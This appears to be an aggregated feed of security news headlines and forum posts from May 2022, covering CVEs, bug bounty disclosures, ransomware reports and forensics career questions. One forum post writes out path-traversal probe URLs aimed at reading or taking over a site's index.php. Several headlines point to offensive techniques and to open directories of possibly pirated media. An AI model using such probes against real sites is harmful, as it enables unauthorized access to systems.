    Step by step guide of setting up SSL/TLS for a server and client
    submitted by /u/Hakky54 [link] [comments]
    Building a Threat Intelligence Feed using the Twitter API and a bit of code
    submitted by /u/Robbedoes_ [link] [comments]
    Understanding CVE-2022-22972 (VMWare Workspace One Access Auth Bypass)
    submitted by /u/Mempodipper [link] [comments]
    How to secure Kubernetes Deployment
    submitted by /u/antfigunio [link] [comments]
    Rikkei Finance Hack: Explained
    submitted by /u/viagumowl [link] [comments]
  • Open

    CVE-2022-28738: Double free in Regexp compilation
    Internet Bug Bounty disclosed a bug submitted by piao: https://hackerone.com/reports/1549636 - Bounty: $4000
  • Open

    Window Registry Forensics Cheatsheet
    submitted by /u/saqfi [link] [comments]
    Master and phd or my job
    I have got a grant for a master's and PhD degree in the USA in cybersecurity. I already have a kind of good job right now; should I take the grant or stay in my job? ** I can't do both. submitted by /u/1328262 [link] [comments]
  • Open

    My First Bounty Reward For low hanging fruit
    Hello Guys, I am Sanath Vyas R working as Web Penetration Tester & Trainer in RVR Security Solutions. Continue reading on Medium »
    WardenSwap is partnering up with Valix Consulting to strengthen the security support
    On the 14th of March, WardenSwap launched a Bug Bounty Program with a reward of up to $100,000 USD on Immunefi. Continue reading on WARDEN Official »
  • Open

    SecWiki News 2022-05-28 Review
    No news updates today~ For more of the latest articles, visit SecWiki
  • Open

    Empire Breakout Target Machine Penetration
    A fairly simple target machine without many hard points; what it tests is still your approach and careful attention!
    "Network Security Standard Practice Guide: Windows 7 Operating System Security Hardening Guidelines": Security Auditing in Security Configuration Hardening (Part 3)
    Based on the practice guide, this article carries out practical hardening work on the security auditing part of Windows 7 security configuration hardening.
  • Open

    How to download a full folder from a website that uses Workers.dev?
    Guys, I've been trying to download courses from this website https://medvideos.su/cursos-gratuitos As you can see, it opens folders full of links that need to be clicked one by one... I've tried to use Link extraction + Mass downloader extensions, but it simply does not get the links needed. submitted by /u/jopelira [link] [comments]
    Around 1.4+ TB of data. (Mostly Chinese)
    https://od.lezi.me/ A few folders had NSFW too. submitted by /u/sematrades [link] [comments]

  • Open

    Questions about the field!
    Hello r/computerforensics! I am fresh in the IT field and have an Associate's degree in Network Security and Computer Forensics! I am in a position to work towards my Bachelor's utilizing my new job's professional development program, and I just have a few questions. I live in a rural area but want to pursue this field. I don't have the ability (due to certain life choices) to move very far. I would like to know the capability to work remotely in this field. I have 4 options for a focus in a degree. While 2 interest me, I'd love to hear from people in the field. The focus areas: 1. General (cloud/mobile security, security monitoring/incident response) 2. Cyber Forensics 3. Information Assurance 4. Cybersecurity Analyst. Final question! Do you find that this field is rewarding? Income doesn't so much matter; I'm already well above what the average of my state is. I suppose that I just want to know if this field is worth it over a general CIS degree. Thanks to anyone who is willing to answer in any capacity! Have a great weekend! submitted by /u/GullibleSquid [link] [comments]
  • Open

    Whoa now, hold up — CRTP
    Wait a minute, hold up. Can I do that with PowerShell? Continue reading on Medium »
    HackMyVM — Djinn
    Writeup (Español) Continue reading on Medium »
    Azure Container Instance Distributed Operations
    Azure Container Instances Distributed Operations (acido CLI) for Red Team Operations through Azure Cloud. Continue reading on Medium »
  • Open

    Opticon USA technical documents and software
    submitted by /u/j4eo [link] [comments]
    large directory of audio files + video files
    https://www.mboxdrive.com/ you can upload your own too: https://mailboxdrive.com/upload/ submitted by /u/SinisterYT06 [link] [comments]
  • Open

    Serious DoS Vulnerability
    Article URL: https://www.theoreticalstructures.io/2022/05/27/the-unbearable-lightness-of-web-vulnerabilities/ Comments URL: https://news.ycombinator.com/item?id=31533658 Points: 2 # Comments: 0
  • Open

    War in Ukraine / May 26
    Russia is not ready for negotiations Continue reading on Medium »
    A new Coordinate System — OSINT Challenge 22
    After a very long break from my blogs I’m back with a standard Quiztime. Shared by contributor @kollege. The objective was simple. We had… Continue reading on Medium »
    My Photo Investigation Toolkit
    Search by photo Extracting metadata Photoforensic tools Fact-checking tools Continue reading on Medium »
  • Open

    Can an IP Address be taken from you?
    No one technically owns their allotted IP addresses, right? Are there different parts of the custody chain that could act against an IP address "owner"? Like DNS, ultimately ICANN is the authority and then a domain registrar serves as a middleman. Two levels of authority that can act against your "ownership" of a domain. submitted by /u/navinpr0 [link] [comments]
    How to take control of the index.php file to modify the page using Traversal and IDOR?
    Hello, I've tried with: http://example.com/index.php?file=view.php http://example.com/index.php?file=index.php http://example.com/index.php?file=../index.php http://example.com/index.php?file=..\index.php Can I have some guidance? Thanks submitted by /u/Traditional_Bird_877 [link] [comments]
  • Open

    GhostTouch: Targeted Attacks on Touchscreens without Physical Touch (pdf, paper)
    submitted by /u/buybank [link] [comments]
    AWS universal rate-limiter bypass
    submitted by /u/thyphoous [link] [comments]
    How Defenders Can Hunt for Malicious JScript Executions
    submitted by /u/Wietze- [link] [comments]
    npm security update: Attack campaign using stolen OAuth tokens
    submitted by /u/mstromich [link] [comments]
  • Open

    SecWiki News 2022-05-27 Review
    Ghostrings is a collection of Ghidra scripts for recovering string definitions i by BaCde; IEEE S&P 2022 remote coverage (4) by ourren; MANDIANT cyber threat intelligence analyst core competency framework by Avenger. For more of the latest articles, visit SecWiki
  • Open

    How to Report Bugs and claim your bounty?
    Steps: Continue reading on SageMaster »
    python hash table Data Structures & Algorithms Python3
    Code : Continue reading on Medium »
  • Open

    FreeBuf Weekly | VMware acquired by semiconductor giant Broadcom; new Zoom vulnerability emerges
    Semiconductor giant Broadcom is acquiring VMware, the virtual machine giant and cloud computing company, for USD 61 billion.
    Analysis of the CHAOS ransomware
    Chaos is a new ransomware developed in 2021. It is still under development and is offered on underground hacker forums, where it is advertised as a new version of Ryuk.
    [Security 101] Were you social-engineered today?
    Includes 19 tips for defending against social engineering.
    2021 OWASP Top 10, one by one: A03:2021 – Injection
    The latest 2021 OWASP Top 10 ranking is out. Starting from A01, we give a detailed interpretation; this series covers the changes and content of each category, with emphasis on newly added items. A03:2021 – Injection factors
    RSAC 2022 is about to begin; who will be the biggest winner of the Innovation Sandbox contest?
    On June 6, 2022, the RSAC 2022 Innovation Sandbox contest will be held. Which company will be the final winner, and which track will see a new wave of interest?
    New dark web market Industrial Spy may have joined the ransomware attack ranks
    Recently, observers found that the new dark web market Industrial Spy is encrypting victims' devices and attempting to launch its own ransomware program.
    Google shut down cache servers at two Russian ISPs
    Two Russian Internet service providers (ISPs) received notification from Google that the Google Global Cache servers on their networks had been disabled.
    OAS platform affected by critical RCE and API access vulnerabilities
    Threat analysts disclosed security vulnerabilities in the OAS platform that can lead to device access, denial of service and remote code execution.
    PoC code is public; this high-severity VMware auth vulnerability needs patching as soon as possible
    On the 26th, Horizon3 security researchers published a proof-of-concept (PoC) exploit and technical analysis for CVE-2022-22972.
    Windows global proxy
    When scanning from purchased VPSes, you may trigger the VPS vendor's security mechanisms (anti-DDoS, for example; I have hit this with both BandwagonHost and Vultr), which shut down the VPS. With a global proxy set up, we can do some scanning from our own computer
  • Open

    Firewall Evasion Techniques using Nmap
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    Control character filtering misses leading and trailing whitespace in file and folder names
    Nextcloud disclosed a bug submitted by david_h1: https://hackerone.com/reports/1402249 - Bounty: $100
    Notification implicit PendingIntent in com.nextcloud.client allows to access contacts
    Nextcloud disclosed a bug submitted by qj_test: https://hackerone.com/reports/1161401 - Bounty: $250
  • Open

    Unfixed GMP Type Confusion in PHP <= 5.6.40
    Authors: Alexey Moskvin, Daniil Sadyrin https://github.com/CFandR-github/PHP-binary-bugs/blob/main/GMP_type_conf_unserialize/GMP_type_conf_advisory.md Requirements: PHP <= 5.6.40 Compiled with: ...
    Looking at CVE-2022-1388 through abuse of HTTP hop-by-hop request headers
    Author: Y4er. Original link: https://y4er.com/post/from-hop-by-hop-to-cve-2022-1388/ Preface: The recently disclosed BIG-IP vulnerability CVE-2022-1388 involves a topic, hop-by-hop headers, that I had not looked into before, hence this article. Recap of CVE-2021-22986: CVE-2021-22986 was caused by improper authentication between Apache and Jetty...
  • Open

    USB Device Redux, with Timelines
    If you ask DFIR analysts, "What is best in life?", the answer you should hear is, "...creating timelines!" After all, industry luminaries such as Andrew said, "Time is the most important thing in life, and timelines are one of the most useful tools for investigation and analysis.", and Chris said, "The timeline is the central concept of all investigative work." My previous blog post addressed USB-connected devices, but only from the perspective of Windows Event Logs. In this blog post, I wanted to include data from the Registry, incorporated in a timeline so that the various data sources could be viewed through a common lens, in a single pane of glass. I started by using wevtutil.exe to export current copies of the five Windows Event Logs to a central location. I then used reg.exe to do…

  • Open

    Physics related OD
    http://www.w2agz.com/Library/ submitted by /u/inoculatemedia [link] [comments]
    Movies and TV
    submitted by /u/owenthewizard [link] [comments]
    Movies-TV-Anime
    http://23.147.64.113/ submitted by /u/SeniorAlbatross [link] [comments]
  • Open

    Full read SSRF in flyte-poc-us-east4.uberinternal.com
    Uber disclosed a bug submitted by ian: https://hackerone.com/reports/1540906 - Bounty: $2000
    [Urgent] Critical Vulnerability [RCE] on vulnerable to Remote Code Execution by exploiting MS15-034, CVE-2015-1635
    U.S. Dept Of Defense disclosed a bug submitted by ashutosh7: https://hackerone.com/reports/469730
    Read Other Users Reports Through Cloning
    U.S. General Services Administration disclosed a bug submitted by hollaatm3: https://hackerone.com/reports/1505609
  • Open

    (Classical Cryptography with Python) Part 1
    Hey everyone, welcome back to my blog. Today I want to demonstrate cryptographic concepts with the Python programming language. Let's kick… Continue reading on Medium »
    CVE-2022–29333 Privilege Escalation Power Director 14 — Exploiting GUI Weakness
    A little while ago I saw a video of a PoC of CVE-2022–0354 where the researcher found a vulnerability in a native application of his… Continue reading on Medium »
    WiFi Hacking | Start hacking WiFi with few simple steps ;)
    This article is divided into 2 parts basic steps required to hack a wireless network Continue reading on Medium »
  • Open

    Scan email inbox to find phishing
    Hi, I am managing 500 employees' inboxes (Microsoft). Are there any solutions that can help me scan all the inboxes daily to discover if there is any missed phishing email sitting inside someone's inbox? submitted by /u/Calm_Scene [link] [comments]
    DDoS Attacks on OT
    Hi guys, Sorry if this is not a good place for this question but I was wondering if you could recommend me some literature, articles and stuff like that regarding DDOS attacks on OT( Operational Technology)? I have to write a paper about that topic but can't find any information about it. submitted by /u/PuzzleheadedYamk [link] [comments]
    EU Control
    Hey guys, I have a question which has interested me for a few days now. This new possible directive unfortunately affects not only these nasty ones, but the entire civilian population. If the EU "chat control" would come into force, how could / would you protect yourself from it? Thank u in advance! Stay healthy submitted by /u/D3ATHB1RD [link] [comments]
    What should I do?
    Hey! HS Junior here. I am currently trying to decide on what I want to do as a career, and have narrowed it down to either Cybersecurity or Quant Finance. Would an undergrad degree in Data Science be good enough for cyber security employers, or should I do a degree in CS? Specifically, I was thinking of doing DS just in case I decide to pursue quant or risk analysis for a Wall Street firm instead, in which case a mathematics/DS background would fare better than a CS one. Thanks! submitted by /u/TakeTheWs [link] [comments]
    Improving penetration test reporting templates
    Hi, I'm in the process of automating reporting, and I was wondering if you can recommend some examples of good and yet simple penetration test templates which include confidentiality, responsibility, summary, scope of systems etc. (the stuff before and after the vulnerabilities). I'm also looking for new layout and design ideas; I would like to modernize some of the graphs and the tables I use. I will appreciate any tips, videos or sources. So far I've found TCMS - Findings Report and public-pentesting-reports on GitHub. Thanks! submitted by /u/tryingtoworkatm [link] [comments]
    What is a cheap/easy WiFi deauth attack detection?
    Without going too big (e.g. setting up a full-blown SIEM, buying an enterprise-grade Wi-Fi security appliance etc.), what's an easy way to detect deauth attacks? I have limited syslogs from the WAPs, but can set up a Mac/Linux/Windows box with a Wi-Fi card or an RPi. I only need to monitor for a limited period in the immediate term, so it's cool to set up something sub-optimal and temporary if it does the job. I can follow an idiot's guide for something moderately complex, but the preference is as simple as possible (e.g. a preconfigured RPi image or a single application with 2 steps to install and configure). In essence, I'd like something that can detect deauth frames and give me a timestamp and originating MAC, either to logs or as an email alert. Budget is like 8 hours labour and 200€. submitted by /u/homelaberator [link] [comments]
  • Open

    Chrome 103 Beta: Early Navigation Hints, a Host of Completed Origin Trials, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 103 is beta as of May 26, 2022. You can download the latest on Google.com for desktop or on Google Play Store on Android. Early Hints for Navigation Chrome now supports the 103 Early Hints HTTP response code for navigation. (Note: the correspondence with the Chrome release number is a coincidence.) When a 103 response includes or other link headers Chromium tries to preload (and/or preconnect, prefetch) specified resources before the final response is received. This gives web developers a way to optimize core web…
  • Open

    Bug Bounty FIRE Goals
    Using bug bounty along side full-time employment is a solid means to attain FIRE. (Financial Independence/Retire Early) Continue reading on Medium »
    AlbusSec:- Penetration-List 07 Cross-Site-Request-Forgery (CSRF) — Sample
    Hi Information Security folk, I hope you are well and doing great in your life, Also I hope You liked my previous article about… Continue reading on Medium »
    Social Media Take Over = Easy Money
    If you are alive like me, you probably also enjoy the idea of easy money. Continue reading on Techiepedia »
    How an Open Redirection Leads to an Account Takeover?
    Hey folks, I'm here to share one of my old findings, in which I found a unique way of an open redirection which leads to an account… Continue reading on InfoSec Write-ups »
    How I hacked Harvard and Cambridge | The anti-wayback method
    This blog is a continuation of my previous one. If you haven't read that, please do so to understand the entire context: Continue reading on Medium »
  • Open

    Career Advice
    Hello everyone, I've just finished uni with a BSc Cybersecurity (United Kingdom). We've covered every domain you can think of. As you know, it's the most important time for us to think about what career or domain in cybersecurity we want to specialise in. I've secured a role within OTT investigation (over the top content)/illegal streaming of content; I know it's early, but I like to plan ahead for my future. However, I've worked as a tech support engineer for medical companies and I didn't enjoy it one bit (I've been through hell desk). The issue is that these two domains are vastly different but may abstractly supplement cybersecurity or DF roles that I may get in the future, so I'm quite conflicted in terms of career pivoting and interests. I've also done a lot of DF, mainly on Windows, Chrome and Mozilla using Autopsy and the EnCase processor etc. I really enjoy investigating things. I was hoping people within DF could share some insight into what some of your duties are, and I'm aware of CSAM in some of the DF roles, especially within LE. submitted by /u/Suspicious-Choice-92 [link] [comments]
  • Open

    Operational Methodologies of Cyber Terrorist Organization “Transparent Tribe”
    No content preview
    Penetration Testing Benefits
    No content preview
    How an Open Redirection Leads to an Account Takeover?
    No content preview
    Secure Code Review -1 | Cheat sheet For Security Vulnerability In Python — Injection Flaws
    Based on OWASP Top-10 Vulnerabilities. This time we are looking for secure coding bugs related to Injection Flaws Continue reading on InfoSec Write-ups »
    Module-2 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    Q. What is Core Rule Set & why it is utilized by all the cloud WAFs? A. We will try to understand more about the core rule set along with… Continue reading on InfoSec Write-ups »
    Module-3 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    1. Setting up Vulnerable Application For AWS WAF Continue reading on InfoSec Write-ups »
  • Open

    Codenotary Adds Background Vulnerability Scanning
    Article URL: https://thenewstack.io/codenotary-adds-background-vulnerability-scanning/ Comments URL: https://news.ycombinator.com/item?id=31522042 Points: 1 # Comments: 0
    Tell HN: Mitigate Security Vulnerability in Tails 5.0
    Mitigate Security Vulnerability in Tails 5.0 : https://tails.boum.org/security/prototype_pollution/index.en.html >We recommend that you stop using Tails until the release of 5.1 (May 31) if you use Tor Browser for sensitive information (passwords, private messages, personal information, etc.). >Security level You can change the security level of Tor Browser to disable browser features as a trade-off between security and usability. For example, you can set the security level to Safest to disable JavaScript completely. The security level is set to Standard by default which gives the most usable experience. about:config set; javascript.enabled to false javascript.options.asmjs to false Comments URL: https://news.ycombinator.com/item?id=31514412 Points: 2 # Comments: 0
  • Open

    War in Ukraine / May 25
    95% of the Luhansk region are occupied Continue reading on Medium »
    How to install anon OS Tails on USB-drive?
    Today we will learn how to install a private OS TAILS — one of the Linux distributions based on Debian with maximum security. Continue reading on Medium »
  • Open

    We Love Relaying Credentials: A Technical Guide to Relaying Credentials Everywhere
    submitted by /u/mgalloar [link] [comments]
    Fully automated threat hunting. Too good to be true?
    https://medium.com/cybersecurityspace/fully-automated-threat-hunting-too-good-to-be-true-88e39fe0f13e Can we get to a point when fully automated threat hunting is possible in the indefinite future? submitted by /u/Cultural_Budget6627 [link] [comments]
    GitHub - sailay1996/CdpSvcLPE: Windows Local Privilege Escalation via CdpSvc service (Writeable SYSTEM path Dll Hijacking)
    submitted by /u/soupcreamychicken [link] [comments]
  • Open

    SecWiki News 2022-05-26 Review
    No news updates today~ For more of the latest articles, visit SecWiki
  • Open

    FreeBuf Enterprise-Side Group Discussion | Would you give domestically developed security products a chance? What do you think of the Sohu phishing email?
    At present, domestically developed technologies, products and services still face enormous challenges and difficulties. How far has localization actually progressed, and which hard problems remain to be solved?
    Malware builder KurayStealer surfaces
    Uptycs researchers recently discovered KurayStealer, a new malware builder sold to criminals to make building malware more convenient.
    MetaStealer takes over from Raccoon Stealer for credential theft
    MetaStealer is a newly emerged information-stealing malware designed to fill the market gap left when Raccoon Stealer ceased operations in March 2022.
    FreeBuf Morning Report | Twitter hit with a huge USD 150 million fine; India's second-largest airline hit by a ransomware attack
    The US Federal Trade Commission (FTC) will fine Twitter USD 150 million.
    "Shenjian Offense and Defense Drill Handbook": 0-day vulnerability attack investigation
    How do you quickly track anomalies and fully investigate the attack chain during offense and defense drills? Watch the Shenjian tool "Xiangshou" do it!
    Arrested! Suspected leader of the SilverTerrier gang taken into custody by Nigerian police
    Nigerian police recently arrested the suspected leader of the SilverTerrier cybercrime gang in Lagos.
    ChromeLoader malware surges, threatening browsers worldwide
    After remaining stable since the start of the year, the volume of ChromeLoader malware rose this month.
    Twitter fined USD 150 million over deceptive targeted advertising
    Because of deceptive advertising, the US Federal Trade Commission (FTC) will fine Twitter USD 150 million.
    New Cheers ransomware is attacking VMware ESXi servers
    VMware ESXi is a virtualization platform widely used by large organizations worldwide, so encrypting it for ransom typically severely disrupts business operations.
  • Open

    How to Detect TOR Network Connections with Falco
    submitted by /u/MiguelHzBz [link] [comments]
    VMware Authentication Bypass Vulnerability (CVE-2022-22972) Technical Deep Dive and POC
    submitted by /u/scopedsecurity [link] [comments]
    Improving the ICS-OT Vulnerability Disclosure Process Between Researchers and Vendors
    submitted by /u/derp6996 [link] [comments]
    VirtualBox leaks host ring 0 SIMD registers into guest ring 3
    submitted by /u/zx2c4 [link] [comments]
  • Open

    Intro to Web App Security Testing: Burp Suite Tips & Tricks
    A brief list of useful things we wish we had known sooner Burp Suite Pro can be complicated and intimidating. Even after learning and becoming comfortable with the core functionality, there remains a great deal of depth throughout Burp Suite, and many users may not stray far from the staples they know. However, after years... The post Intro to Web App Security Testing: Burp Suite Tips & Tricks appeared first on TrustedSec.
  • Open

    Letsdefend.io EventID 116
    The alert with EventID 116 shows that Javascript code is detected in URL. Continue reading on Medium »

  • Open

    What was Bryan Neumeister talking about in the Johnny Depp defamation case?
    Can someone go into detail about what exactly Bryan Neumeister was talking about in the Johnny Depp defamation case? submitted by /u/YungTerpenzee [link] [comments]
    Book suggestions for digital forensics enthusiast
    Hello Guys, I am interested in digital forensics and wish to read some good books on it. It may be an introduction to this domain which is easy to understand, written by a field expert and maybe fun to read, but should illustrate the domain well. Please do suggest books or post links to purchase. TIA :) submitted by /u/the_bearded_madrasi [link] [comments]
    virtual chain of custody
    Anyone have a process for virtual chain of custody? Like if a client sends you a VM or AWS snapshot, do you record chain of custody? Curious what other groups do. submitted by /u/CrazyKitty2016 [link] [comments]
    Examiners in the field, what happens with a case and its evidence if the device is infected with malware?
    Hello all, I am a junior malware analyst/IR and am currently writing my undergraduate thesis for a B.S. in Computer Forensics. For my thesis, I am gearing towards a malware angle applied to digital forensics since those are both my passions. I have conducted extensive research, but one thing I cannot get a solid grasp on is what happens to an investigation when the examiner(s) confirm that the device is infected with malware. Does the investigation continue regardless and all pertinent evidence per the limits of the warrant is documented as normal? Or does the investigation pause and the device is handed off to a third-party to conduct professional malware analysis on the device to determine if evidence has been either generated by the malware itself or tampered with? submitted by /u/ringzero_ [link] [comments]
    Advice considering a career in computer forensics
    I currently have a bachelor's degree in computer & information technology and am currently working towards getting a master's degree in computer technology and data science. I always imagined that my degrees would lead me to a career in programming. However, I have recently learned about computer forensics and it sounds like a fun and interesting career. What sort of requirements and training are needed for a career in this field? I probably would want a job assisting police and law enforcement in investigations. What sort of salary would a job like this have, and what benefits and drawbacks would a job like this have? I have a limited knowledge of what the job market is like for this profession so any information would be nice! submitted by /u/No_Curve_3351 [link] [comments]
  • Open

    Pre-hijacked accounts (pdf, research paper)
    submitted by /u/ScottContini [link] [comments]
    Zoom RCE via "xmpp stanza smuggling"
    submitted by /u/phree_radical [link] [comments]
    RCE over ham radio - Reverse shell via WinAPRS
    submitted by /u/rickostuff [link] [comments]
    Security Code Audit - For Fun and Fails
    submitted by /u/scopedsecurity [link] [comments]
    Tetragon: case study of security product's self-protection
    submitted by /u/hardenedvault [link] [comments]
    seL4 Whitepaper released.
    submitted by /u/providerstatistics [link] [comments]
    The printer goes brrrrr!!!
    submitted by /u/0xdea [link] [comments]
    Finding Bugs in Windows Drivers, Part 1 – WDM
    submitted by /u/jat0369 [link] [comments]
  • Open

    Vulnerability In PayPal worth 200000$ bounty
    Article URL: https://medium.com/@h4x0r_dz/vulnerability-in-paypal-worth-200000-bounty-attacker-can-steal-your-balance-by-one-click-2b358c1607cc Comments URL: https://news.ycombinator.com/item?id=31510256 Points: 1 # Comments: 1
    Security Vulnerability in Tor Browser
    Article URL: https://darknetlive.com/post/psa-security-vuln-in-tor-browser/ Comments URL: https://news.ycombinator.com/item?id=31509777 Points: 187 # Comments: 94
    Serious security vulnerability in Tails 5.0
    Article URL: https://tails.boum.org/security/prototype_pollution/index.en.html Comments URL: https://news.ycombinator.com/item?id=31501499 Points: 4 # Comments: 0
  • Open

    How I made it into the United Nations hall of fame as I slept
    This article is going to be about how I got my name in the United Nations hall of fame for finding a reflected XSS bug as I slept. Continue reading on Medium »
    2fa bypass again
    Hello My Dear Buggies!!! Continue reading on Medium »
    Atlassian Jira Seraph Authentication Bypass RCE
    CVE-2022–0540 Continue reading on Medium »
    Module-2 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    Q. What is the Core Rule Set and why is it utilized by all the cloud WAFs? A. We will try to understand more about the core rule set along with… Continue reading on InfoSec Write-ups »
    Secure Code Review -1 | Cheat sheet For Security Vulnerability In Python — Injection Flaws
    Based on OWASP Top-10 Vulnerabilities. This time we are looking for secure coding bugs related to Injection Flaws Continue reading on InfoSec Write-ups »
    My Blackhat stories- How I hacked a college and paid my friend's fees
    Intro: Continue reading on Medium »
    How I was able to hack A Panel PHP Material_Wallpaper(solodroid)&Viaviweb
    Hello everyone, I’m “the injector”, I’m a network administrator and a bug bounty hunter, today I will show you how I hacked a panel of PHP… Continue reading on Medium »
  • Open

    Lots of old cartoons, some Spanish
    http://fina.dyndns.tv/Cartoons/ Go up a directory for other media submitted by /u/inoculatemedia [link] [comments]
    torrent RSS feeds of premium leftie podcasts
    submitted by /u/kBr9gFITLKkTVSEiQ6PJ [link] [comments]
  • Open

    Taking ESF For A(nother) Spin
    2+ years ago from the date of this blog post I wrote my initial blog post where I started becoming familiar with Apple’s Endpoint Security… Continue reading on Medium »
    Attack and Hunting Lateral Movement with Service Control Manager(SVCCTL)
    There are some lateral movement techniques that don't rely on vulnerabilities, like WMI, PsExec and DCOM. These methods require that… Continue reading on Medium »
  • Open

    War in Ukraine / May 24
    👉 The greatest air battle of the 21st Century [Expert View] Continue reading on Medium »
    Approaching CTF OSINT Challenges — Learn by Example
    New to OSINT challenges? Based on examples from the recent 2022 NahamCon CTF, I provide general recommendations on solving OSINT challenges. Continue reading on InfoSec Write-ups »
  • Open

    "vPub v5" opensource online Party! - this Thursday at 4 PM UTC
    submitted by /u/Mike-Banon1 [link] [comments]
  • Open

    Blind XSS in app.pullrequest.com/ via /reviews/ratings/{uuid}
    HackerOne disclosed a bug submitted by bugra: https://hackerone.com/reports/1558010 - Bounty: $2500
    Stored XSS in Notes (with CSP bypass for gitlab.com)
    GitLab disclosed a bug submitted by joaxcar: https://hackerone.com/reports/1481207 - Bounty: $13950
    Email templates XSS by filterXSS bypass
    Judge.me disclosed a bug submitted by caue: https://hackerone.com/reports/1404804 - Bounty: $1250
  • Open

    SecWiki News 2022-05-25 Review
    HTB-467-Noter by o1hy; Gmail's restrictions on attachments by ourren; IEEE S&P 2022 remote coverage (3) by ourren; IEEE S&P 2022 remote coverage (2) by ourren; IEEE S&P 2022 remote coverage (1) by ourren; Cloud-native security: the Tetragon case and a security product's self-protection by ourren; SHADEWATCHER: cyber threat analysis based on system audit records and recommendation concepts by ourren; for more of the latest articles, visit SecWiki
  • Open

    Operation Delilah: Unit 42 Helps INTERPOL Identify Nigerian Business Email Compromise Actor
    INTERPOL and The Nigeria Police Force arrested a prominent business email compromise actor as part of Operation Delilah. The post Operation Delilah: Unit 42 Helps INTERPOL Identify Nigerian Business Email Compromise Actor appeared first on Unit42.
  • Open

    How to conduct a security audit of Power BI?
    I want to conduct a security audit of Power BI. What I mean by security audit: 1) a list of all workspaces; 2) a list of all reports/dashboards/etc. and permissions (who has access and with whom they are shared). Do you know what role I need in O365 to have permission to see such information? Right now I can see only "My workspace", but I need a list of all workspaces of my organization. Does someone have experience with security assessment/audit of Power BI? submitted by /u/athanielx [link] [comments]
    Security Testing/Assessment - Sharepoint Plugin
    How can one assess the security of available plugins for SharePoint? AMREIN has a large number of plugins available. The business has requested security checks before purchase. Can someone share a security checklist for plugins or available tools on the web to test? What are the common concerns around plugins? submitted by /u/Anahata___ [link] [comments]
  • Open

    FreeBuf Morning Report | Australia, India, Japan and the US pledge to deepen data security cooperation; first attack technique targeting 6G networks revealed
    Leaders of the four-nation alliance of Australia, India, Japan and the United States met on the 24th and pledged to deepen cooperation on information security, data sharing and other areas.
    All about port scanning
    Do not use the techniques described in this article for illegal testing; the author bears no responsibility for any adverse consequences arising from it.
    [Very detailed] Vulnhub lab: DC-3
    A very detailed walkthrough of the Vulnhub lab DC-3, shared for learning.
    Tianyi Cloud (China Telecom) Security Lab | A technical share on tracing the source of a phishing email
    Phishing email attacks have been frequent recently. Tianyi Cloud Security Lab selected a phishing email to analyze and trace back, to raise awareness and help everyone defend against phishing attacks.
    Web Security Basics: Cross-Site Scripting (XSS)
    Cross-site scripting (XSS) is the number one enemy of client-side security; the OWASP Top 10 has repeatedly listed XSS at the top.
    Sohu reportedly hit by an epic email scam; Zhang Chaoyang responds
    Zhang Chaoyang said that a Sohu employee's internal mailbox password was stolen; the scammers impersonated the finance department and sent phishing emails to employees, with total losses under 50,000 yuan.
    Ransomware attacks are increasing at an alarming rate
    According to the latest report, ransomware breach incidents increased by 13%.
    Watch your wallet! Microsoft warns of stealthier payment credential theft attacks
    Microsoft security researchers recently observed web skimming attacks that use multiple obfuscation techniques to evade detection. Most of these attacks target e-commerce and similar platforms to steal users' payment credentials.
    Dingmao Technology: data + AI to enhance security operations | Cybersecurity New Force SOLO Launch Season
    How should AIOps get closer to business needs while solving all kinds of data governance problems? The Cybersecurity New Force SOLO Launch Season tells you the answer.
  • Open

    Learning Linux & InfoSec Principles Using OverTheWire’s Bandit — Part 4
    No content preview
    Approaching CTF OSINT Challenges — Learn by Example
    No content preview
    TryHackMe writeup: HackPark
    No content preview
    Nunchucks from HackTheBox — Detailed Walkthrough
    No content preview
    Antivirus Evasion — Part 1
    No content preview
    Hacking Web3: Introduction and How to Start
    No content preview
    Kerberos Authentication in Active Directory
    No content preview
  • Open

    Critical broken cookie signing on dagobah.flickr.com
    Flickr disclosed a bug submitted by ian: https://hackerone.com/reports/1440290 - Bounty: $479
    [com.exness.android.pa Android] Universal XSS in webview. Lead to steal user cookies
    EXNESS disclosed a bug submitted by nearsecurity: https://hackerone.com/reports/532836 - Bounty: $400
    Cross-site scripting on dashboard2.omise.co
    Omise disclosed a bug submitted by oblivionlight: https://hackerone.com/reports/1532858 - Bounty: $200
  • Open

    Windows Firewall Event Logs
    I have a ransomware attack and am looking at several event logs from a local machine on the network that show rules being added, changed, and deleted referencing the Windows Firewall. These events are consistent on almost a daily basis and occur almost exclusively during the early morning hours when the business was closed for several weeks leading up to the implementation of the ransomware. Other than the attackers, are there any normal circumstances that may have caused this on such a consistent basis, such as normal updates? With that being said, I am limited in verifying a lot of evidence as the business had already wiped their servers and most local machines by the time I got involved… so I’m pretty much limited to this single computer to figure out what I can. submitted by /u/outdorksman [link] [comments]
    Practice Investigating Linux Systems using only Linux CLI + Cyber5W Mini CTF Hints
    submitted by /u/DFIRScience [link] [comments]
    Private Investigator / DFIR crossover?
    Some of my coworkers have their PI licenses, and becoming a DF/PI consultant is something that I've toyed with. I have intelligence and an LE background, so it's not a crazy idea. Does anyone have any experience going this route? TIA! submitted by /u/FAlady [link] [comments]
    Postgraduate Degree Dilemma
    I am 22 and I just graduated with a BSc Computer and Digital Forensics degree. I am considering taking a master's degree but I haven’t decided yet what to do. My first choice is to continue in the field relevant to my bachelor's degree and pursue further education in Digital Forensics with a master's like MSc Cybersecurity, MSc Digital Forensics or MSc Advanced Computer Science. My second option is to take an LLM Cyber Law master's, as I was always interested in this area. My concern is whether the LLM Cyber Law degree will actually help me and reinforce my bachelor's degree and give me a good combination of degrees for the job field, rather than being an irrelevant master's degree. Another thing: is it a good idea to study LLM Cyber Law without having a basic law degree, and how will this affect me in the job field? I'm really trying to figure out what you think is best from your perspective. I want to hear any advice or recommendations you may have. submitted by /u/AshMustard15 [link] [comments]
  • Open

    How to Buy X Doge Token ($X) — Beginner’s Guide
    Continue reading on Medium »
    VulnHub: CySec: 2
    Today we will take a look at Vulnhub: CySec 2. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to… Continue reading on Medium »
  • Open

    Multiple vulnerabilities in radare2
    submitted by /u/soupcreamychicken [link] [comments]
